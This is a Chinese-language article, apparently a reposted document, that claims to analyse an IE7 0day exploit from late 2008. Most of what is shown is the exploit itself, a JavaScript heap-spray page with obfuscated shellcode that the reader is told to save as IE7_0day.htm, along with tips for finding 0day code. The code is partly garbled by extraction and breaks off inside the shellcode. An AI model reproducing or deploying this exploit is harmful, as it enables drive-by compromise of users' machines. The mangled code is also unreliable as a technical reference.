攻防实战：深入剖析最新IE7.00day漏洞利用代码.docVIP

　　攻防实战：深入剖析最新IE7.0 0day漏洞利用代码～教育资源库 　　这几天国内几乎所有的媒体都用大幅的版面报道了IE7.0的最新漏洞，由于微软迟迟没有推出安全补丁，并且该漏洞能影响到所有使用IE控件的程序，包括各主要浏览器、邮件客户端、办公软件、Rss订阅器以及可嵌入网页的所有第三方软件，影响范围极其广泛！笔者做了一个试验，在Google浏览器中中搜索一下ie7.0 0day出来2700多条记录，各大杀毒厂商纷纷推出漏洞修复工具以及预防方法，感觉比MS08067漏洞还热闹，算是岁末安全界的一件大事。 　　12月9 日，国内一些安全界知名人士的blog纷纷贴出了漏洞代码，不少无赖网站都纷纷挂上了恶意代码已获取利益。笔者的几个朋友未能幸免，点击恶意网站后导致机器蓝屏无法加载系统，只得郁闷的重装。为了了解恶意代码的危害，提高大家的安全意识，笔者在这里对该恶意代码进行一个简单的分析，希望能对大家有所帮助，避免不必要的损失。 　　获取IE7.0 最新漏洞代码 　　1.获取IE7.0 0day代码 　　获取代码的一个最好的方式就是通过Google等搜索工具搜索，推荐在本地在虚拟机中使用VPN代理到Google英文版中搜索，相对而言国外会早于国内公布0day代码。关于该漏洞代码，现在很多安全和黑客网站都已经贴出了代码，如果没有该代码的可以到bbs/viep;extra=page%3D1(呵呵，顺便帮团队做下广告)将以下代码保存为将该代码保存为IE7_0day.htm，即IE7.0 0Day。 lt;script language=javascriptgt; if(navigator.userAgent.toLosie 7)==-1)location.replace(about:blank); function sleep(milliseconds) { var start=nee(); for(var i=0;ilt;1e7;i++) {if((nee()-start)gt;milliseconds) {break} } } function spray(sc) { var infect=unescape(sc.replace(/dadong/g,x25x75)); var heapBlockSize=0x100000; var payLoadSize=infect.length*2; var szlong=heapBlockSize-(payLoadSize+0x038); var retVal=unescape(%u0a0a%u0a0a); retVal=getSampleValue(retVal,szlong); aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize; zzchuck=nepleValue(retVal,szlong) { while(retVal.length*2lt;szlong) {retVal+=retVal} retVal=retVal.substring(0,szlong/2); return retVal } var a1=dadong; spray(a1+9090+a1+dadong9090dadong9090dadongE1D9dadong34D9dadong5824dadong5858dadong3358dadongB3DBdadong031C dadong31C3dadong66C9dadongE981dadongFA65dadong3080dadong4021dadongFAE2dadong17C9dadong2122dadong4921dadong0121 dadong2121dadong214BdadongF1DEdadong2198dadong2131dadongAA21dadongCAD9dadong7F24dadong85D2dadongF1DEdadongD7C9 dadongDEDEdadongC9DEdadong221Cdadong2121dadongD9AAdadong19C9dadong2121dadongC921dadong206Cdadong2121dadong67C9 dadong2121dadongC921dadong22FAdadong2121dadongD9AAdadong03C9dadong2121dadongC921dadong2065dadong2121dadong11C9 dadong2121dadongC921dadong22A8dadong2121dadongD9AAdadong2DC9dadong2121dadongC921dadong2040dadong2121dadong3BC9 dadong2121dad